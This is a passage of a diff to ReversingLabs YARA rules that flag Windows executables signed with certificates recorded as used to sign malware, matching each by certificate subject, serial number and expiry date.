(0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KREATURHANDLER BJARNE ANDERSEN ApS" and pe.signatures[i].serial=="31:12:c6:9d:46:0c:78:1f:d6:49:c7:1e:61:bf:ec:82" and 1614902400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E0134C41E7Eda6863C4Eee5B003976Dd : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0A5B4F67Ad8B22Afc2Debe6Ce5F8F679 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "395c14fd-2fec-53ad-bc8e-2dd4bb3522d2" + id = "7dd5ba42-2d04-52d7-b15a-2bdba2e742fb" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14674-L14692" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fbe34baf52e3fa7d7cdfcfaef9b8851c4cbeb46d17eeade61750e59cf0c13291" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8768-L8784" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "938efb7ee19970484aded5cd46b2ff730f8882706bec3f062bdebde3cc9a4799" score = 75 quality = 90 tags = "INFO, FILE" @@ -20487,22 +40278,22 @@ rule REVERSINGLABS_Cert_Blocklist_E0134C41E7Eda6863C4Eee5B003976Dd : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "5000 LIMITED" and (pe.signatures[i].serial=="00:e0:13:4c:41:e7:ed:a6:86:3c:4e:ee:5b:00:39:76:dd" or pe.signatures[i].serial=="e0:13:4c:41:e7:ed:a6:86:3c:4e:ee:5b:00:39:76:dd") and 1528070400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Farad LLC" and pe.signatures[i].serial=="0a:5b:4f:67:ad:8b:22:af:c2:de:be:6c:e5:f8:f6:79" and 1607472000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5B47A4739Dd8Ffe81D9B5307 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Df45B36C9D0Bd248C3F9494E7Ca822 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9688b091-9a77-59c2-b7f9-a8b652201b8f" + id = "d7d0d1c4-b341-5651-8179-4035f537ba98" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14694-L14710" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5f35f520d4af26fa648553894a5b0db043d0c32302d94f531b6cb48691396a92" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8786-L8804" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9c03522376b0d807cd36a0641e474d770bc3b4f8221f26d232878d2d320d072b" score = 75 quality = 90 tags = "INFO, FILE" @@ -20512,22 +40303,22 @@ rule REVERSINGLABS_Cert_Blocklist_5B47A4739Dd8Ffe81D9B5307 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="5b:47:a4:73:9d:d8:ff:e8:1d:9b:53:07" and 1476953007<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MPO STORITVE d.o.o." and (pe.signatures[i].serial=="00:df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22" or pe.signatures[i].serial=="df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22") and 1619740800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4F5A9Bf75Da76B949645475473793A7D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1Ae3C4Eccecda2127D43Be390A850Dda : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "90cdf420-bdfc-509a-a64f-f30710f09f3b" + id = "a9d8906b-64f6-5c5d-80e0-ab916e83b613" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14712-L14728" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8c58d30b1b6ef80409d9da5f5f4bc26a8818b01cc388b5966c8b68ed0e4c5a2a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8806-L8822" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8a2ff4f7a5ac996127778b1670e79291bddcb5dee6e7da2b540fd254537ee27e" score = 75 quality = 90 tags = "INFO, FILE" @@ -20537,22 +40328,22 @@ rule REVERSINGLABS_Cert_Blocklist_4F5A9Bf75Da76B949645475473793A7D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EXEC CONTROL LIMITED" and pe.signatures[i].serial=="4f:5a:9b:f7:5d:a7:6b:94:96:45:47:54:73:79:3a:7d" and 1553817600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PARTYNET LIMITED" and pe.signatures[i].serial=="1a:e3:c4:ec:ce:cd:a2:12:7d:43:be:39:0a:85:0d:da" and 1614902400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_081Df56C9A48D02571F08907 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2E36360538624C9B1Afd78A2Fb756028 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4f4fb099-406a-5def-9a26-46c6807cfe7f" + id = "549a566b-0c94-516c-9231-a5e54136785f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14730-L14746" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "25d91f09e0731ab09a05855442b72589eb30e1c7d5e4c0a7af760eea540d786f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8824-L8840" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9cbb50c7d383048fd506506fa9ee8bf7c6d82feaf21bcde4008ab99b82e234a7" score = 75 quality = 90 tags = "INFO, FILE" @@ -20562,22 +40353,22 @@ rule REVERSINGLABS_Cert_Blocklist_081Df56C9A48D02571F08907 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="08:1d:f5:6c:9a:48:d0:25:71:f0:89:07" and 1474870728<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ts Trade ApS" and pe.signatures[i].serial=="2e:36:36:05:38:62:4c:9b:1a:fd:78:a2:fb:75:60:28" and 1615766400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_77D5C1A3E623575999C74409Dc19753C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Addb899F8229Fd53E6435E08Bbd3A733 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8f8ce24d-8330-509a-a7a1-2727c6f8bdd9" + id = "1e5f0577-ba05-5e43-a817-c75f65547c3d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14748-L14764" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "54921ce39a0876511b33ac6fa088c3342e2ea7fa037423fe72825bfe9c83bce6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8842-L8860" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ecb8e31b8c56b92cef601618e0adc2f6d88999318805b92389693aa9e8050d18" score = 75 quality = 90 tags = "INFO, FILE" @@ -20587,22 +40378,22 @@ rule REVERSINGLABS_Cert_Blocklist_77D5C1A3E623575999C74409Dc19753C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="77:d5:c1:a3:e6:23:57:59:99:c7:44:09:dc:19:75:3c" and 1475884800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "U.K. STEEL EXPORTS LIMITED" and (pe.signatures[i].serial=="00:ad:db:89:9f:82:29:fd:53:e6:43:5e:08:bb:d3:a7:33" or pe.signatures[i].serial=="ad:db:89:9f:82:29:fd:53:e6:43:5e:08:bb:d3:a7:33") and 1616630400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E9756B3F38B1172Ea89Fdbdfdba5F979 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_C1A1Db95D7Bf80290Aa6E82D8F8F996A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "77d7470c-0c60-5ef4-b1d9-35642c147afe" + id = "c04a2731-5eb8-5db4-9e88-cab9b61952e4" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14766-L14784" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "997a9433f907896d82f22ae323bf9cfe9aa04a2a49c5505e98adbb34277fcc15" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8862-L8880" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "84c7c0e53facadcdfd752e9cf3811fbfd6aac4bef4109acf430a67b6dcd37bfc" score = 75 quality = 90 tags = "INFO, FILE" @@ -20612,22 +40403,22 @@ rule REVERSINGLABS_Cert_Blocklist_E9756B3F38B1172Ea89Fdbdfdba5F979 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kreamer Ltd" and (pe.signatures[i].serial=="00:e9:75:6b:3f:38:b1:17:2e:a8:9f:db:df:db:a5:f9:79" or pe.signatures[i].serial=="e9:75:6b:3f:38:b1:17:2e:a8:9f:db:df:db:a5:f9:79") and 1492732800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Software Two Pty Ltd" and (pe.signatures[i].serial=="00:c1:a1:db:95:d7:bf:80:29:0a:a6:e8:2d:8f:8f:99:6a" or pe.signatures[i].serial=="c1:a1:db:95:d7:bf:80:29:0a:a6:e8:2d:8f:8f:99:6a") and 1615334400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_09Fb28 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_C667Ffe3A5B0A5Ae7Cf3A9E41682E91B : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e7701457-c6cd-5b20-b227-8a9cdcde8213" + id = "83a5e5c2-0932-526b-80aa-800b37088bbd" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14786-L14802" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5ed65d33b73977e869460ba51271aff94811fa2f41e4a2993c47233add2f38dd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8882-L8900" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "be2cd688f2d7c458ee764bd7a7250e0116328702db5585b444d631f05cdc701b" score = 75 quality = 90 tags = "INFO, FILE" @@ -20637,22 +40428,22 @@ rule REVERSINGLABS_Cert_Blocklist_09Fb28 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "New Dial spa" and pe.signatures[i].serial=="09:fb:28" and 1046968418<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NAILS UNLIMITED LIMITED" and (pe.signatures[i].serial=="00:c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" or pe.signatures[i].serial=="c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b") and 1616976000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_197Dc32D915458953562D2Fe78Bf2468 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_E0A83917660D05Cf476374659D3C7B85 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9c25410f-6a3d-5e6e-b270-ccec3be34e80" + id = "3387f396-01f7-58b1-a5bd-b308105c66d6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14804-L14820" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e61284a74765592fe97b90ca1c260efa46ea31286e6d09ab32d6c664b8271f2a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8902-L8920" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f60753ecb775d664e07e78611568799eaf06fb4742bcef3bf0c28202daf98c50" score = 75 quality = 90 tags = "INFO, FILE" @@ -20662,22 +40453,22 @@ rule REVERSINGLABS_Cert_Blocklist_197Dc32D915458953562D2Fe78Bf2468 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Y.L. Knafo, Ltd." and pe.signatures[i].serial=="19:7d:c3:2d:91:54:58:95:35:62:d2:fe:78:bf:24:68" and 1575331200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PIK MOTEL S.R.L." and (pe.signatures[i].serial=="00:e0:a8:39:17:66:0d:05:cf:47:63:74:65:9d:3c:7b:85" or pe.signatures[i].serial=="e0:a8:39:17:66:0d:05:cf:47:63:74:65:9d:3c:7b:85") and 1621468800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7C0Be3D14787351E3156F5F37F2B3663 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Afc5522898143Aafaab7Fd52304Cf00C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "14a292da-36c1-5a37-b27e-20c982e44c25" + id = "016ad027-bd6a-58e0-9099-341b81dd6f70" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14822-L14838" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "66c2cd84fccedd2afef00495c49d0c2844e2e5e190e6a859d2970e8ddb4a35c2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8922-L8940" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bfcf2fbbd9be97202eeb44c0f81f0a0713d4d30c466f2b170231c7f9df0e9e6d" score = 75 quality = 90 tags = "INFO, FILE" @@ -20687,22 +40478,22 @@ rule REVERSINGLABS_Cert_Blocklist_7C0Be3D14787351E3156F5F37F2B3663 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Apex Tech, SIA" and pe.signatures[i].serial=="7c:0b:e3:d1:47:87:35:1e:31:56:f5:f3:7f:2b:36:63" and 1523318400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "YAN CHING LIMITED" and (pe.signatures[i].serial=="00:af:c5:52:28:98:14:3a:af:aa:b7:fd:52:30:4c:f0:0c" or pe.signatures[i].serial=="af:c5:52:28:98:14:3a:af:aa:b7:fd:52:30:4c:f0:0c") and 1622419200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_05054Fdea356F3Dd7Db479Fa : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_8B3333D32B2C2A1D33B41Ba5Db9D4D2D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c78d42bc-f8ca-579a-af49-ba9c7b63ef07" + id = "f7f72cd2-0bf4-5aa7-804e-4ae354eda055" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14840-L14856" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "02ec52e060a6b8b3edfad0a1f5b1f2d6c409645d5233612d0d353ad74bcd4568" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8942-L8960" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cdb3f1983ed17df22d17c6321bc2ead2c391d70fdca4a9f6f4784f62196b85d0" score = 75 quality = 90 tags = "INFO, FILE" @@ -20712,22 +40503,22 @@ rule REVERSINGLABS_Cert_Blocklist_05054Fdea356F3Dd7Db479Fa : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="05:05:4f:de:a3:56:f3:dd:7d:b4:79:fa" and 1474436511<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BOOK CAF\\xC3\\x89, s.r.o." and (pe.signatures[i].serial=="00:8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" or pe.signatures[i].serial=="8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d") and 1620000000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_08Aaa069E92517F21Ce67Ca713F6Ea63 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Fbb1198Bd8Bddb0D693Eb72A8613Fe3F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d468530e-8a51-583e-a108-e409f0144165" + id = "f9983426-9f05-56e2-8ad0-1c5a48ab04be" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14858-L14874" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "28ad7e9c75a701425003cde4a7eb10fa471394628cd5004412778d8d7cddb50b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8962-L8980" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2e004116d0f8df5a625b190127655926336fc74b4cce4ae40cd516a135e5d719" score = 75 quality = 90 tags = "INFO, FILE" @@ -20737,22 +40528,22 @@ rule REVERSINGLABS_Cert_Blocklist_08Aaa069E92517F21Ce67Ca713F6Ea63 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "pioneersoft" and pe.signatures[i].serial=="08:aa:a0:69:e9:25:17:f2:1c:e6:7c:a7:13:f6:ea:63" and 1368403200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Trade Hunters, s. r. o." and (pe.signatures[i].serial=="00:fb:b1:19:8b:d8:bd:db:0d:69:3e:b7:2a:86:13:fe:3f" or pe.signatures[i].serial=="fb:b1:19:8b:d8:bd:db:0d:69:3e:b7:2a:86:13:fe:3f") and 1620000000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1B7B54E0Dd4D7E45A0B46834De52658D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_846F77D9919Fc4405Aefe1701309Bd67 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "376da749-3cd4-5e37-b1ee-013e839f98ce" + id = "c326fbf0-2d95-5aa1-9ae4-6cb04b9c2212" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14876-L14892" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5febbce8c39440bfc4846f509f0b1dd4f71a8b4dc24fa18afb561d26e53c2446" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8982-L9000" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6739049a61183d506daf9aaf44a3b15cbf2234c6af307ec95bc07fa3d8501105" score = 75 quality = 90 tags = "INFO, FILE" @@ -20762,22 +40553,22 @@ rule REVERSINGLABS_Cert_Blocklist_1B7B54E0Dd4D7E45A0B46834De52658D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="1b:7b:54:e0:dd:4d:7e:45:a0:b4:68:34:de:52:65:8d" and 1476662400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "IPM Skupina d.o.o." and (pe.signatures[i].serial=="00:84:6f:77:d9:91:9f:c4:40:5a:ef:e1:70:13:09:bd:67" or pe.signatures[i].serial=="84:6f:77:d9:91:9f:c4:40:5a:ef:e1:70:13:09:bd:67") and 1621382400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_B63E4299D0B0E2Dcdaeb976167A23235 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0939C2Bad859C0432E8E98A6C0162C02 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "44af31cc-e0c9-5f3f-9645-a0453bc81e62" + id = "5dba4570-51d8-5c23-85a5-5de9a048793f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14894-L14912" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "da7415d0bc0245dea6a4ec325da5140c79c723c20fb7c04ff14f59a3089a5c88" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9002-L9018" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3c48241e52e58600bfa0385742831dba59d9cbd959cd6853fe8e030f5df79c23" score = 75 quality = 90 tags = "INFO, FILE" @@ -20787,22 +40578,22 @@ rule REVERSINGLABS_Cert_Blocklist_B63E4299D0B0E2Dcdaeb976167A23235 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Baltservis LLC" and (pe.signatures[i].serial=="00:b6:3e:42:99:d0:b0:e2:dc:da:eb:97:61:67:a2:32:35" or pe.signatures[i].serial=="b6:3e:42:99:d0:b0:e2:dc:da:eb:97:61:67:a2:32:35") and 1604102400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Activ Expeditions ApS" and pe.signatures[i].serial=="09:39:c2:ba:d8:59:c0:43:2e:8e:98:a6:c0:16:2c:02" and 1615939200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1Dabae616705F5A51152Eac48423F354 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7Fba0E19919Ac50D700Ba60250D02C8B : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8b050402-d5d3-5733-9a72-02386d850a04" + id = "8828c863-2800-5f66-968e-96a41a071218" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14914-L14930" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0bb14ececa3a78e1a2e71cfdee8bc57678251b15151d156ef5fa754b2438ee35" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9020-L9036" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8c803111df930056bdc3ef7560f07bf4d255b93286d01ecc55f790e72565ba5d" score = 